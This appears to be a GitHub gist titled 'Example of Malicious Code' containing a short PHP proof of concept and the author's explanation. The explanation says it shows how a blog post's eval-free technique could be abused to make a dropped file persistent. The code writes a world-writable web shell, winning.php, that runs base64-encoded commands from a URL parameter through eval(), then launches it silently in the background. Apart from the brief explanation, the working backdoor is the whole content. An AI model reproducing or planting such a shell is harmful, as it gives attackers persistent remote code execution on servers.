public
Created

Example of Malicious Code

  • Download Gist
malicious.php
PHP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
<?php
// insert malicious code here...
try {
$script = '
<?php
// harmful code
if (!empty($_GET['exec'])) {
eval(base64_decode($_GET['exec']))
}';
 
// save the file
file_put_contents('./winning.php', $script);
@chmod('./winning.php', 0777);
 
// run harmful file in background
exec("php ./winning.php > /dev/null 2>&1 &");
} catch (Exception $e) {}
 
// trigger error
$winning = new DuhWinning();

can you please explain your code?

The code above is in response to a blog post entitled "How to use eval() without using eval() in PHP" by Gonzalo Ayuso. I was merely pointing out security flaws in the non-eval implementation (not that eval is secure) that would allow an attacker to bypass his unlink() call for removing the file, thereby making it persistent. I added some logic to make it run in the background for shits and giggles. It's merely a proof of concept, so it doesn't actually have any real functionality or purpose.

You can read Gonzalo's blog post at http://gonzalo123.wordpress.com/2012/03/12/how-to-use-eval-without-using-eval-in-php/

Please sign in to comment on this gist.

Something went wrong with that request. Please try again.